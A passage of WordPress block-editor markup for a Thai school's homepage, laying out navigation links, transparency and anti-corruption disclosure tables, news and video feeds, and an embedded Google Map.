data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=609\" data-type=\"page\" data-id=\"609\">ข้อมูลสิ่งก่อสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=656\" data-type=\"page\" data-id=\"656\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=605\" data-type=\"page\" data-id=\"605\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=496\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=496\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":503,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post.png\" alt=\"\" class=\"wp-image-503\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#ff6900\"} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?post_type=popupbuilder&amp;p=328\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=542\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\" data-type=\"page\" data-id=\"355\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=506\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=337\">Q&amp;A</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong>รายงานผลการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"bohtnagp\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showThumbnail\":false,\"showTaxonomy\":false,\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"showPagination\":true,\"titleTag\":\"h6\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"headingBgColor\":\"#ff6900\",\"titleHoverColor\":\"#ff6900\",\"titleBgColor\":\"#ffffff\",\"titleHoverBgColor\":\"#ffffff\",\"titleWeight\":\"500\",\"titlefStyle\":\"\",\"titleTran\":\"\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18}} /-->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#130b0b\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container 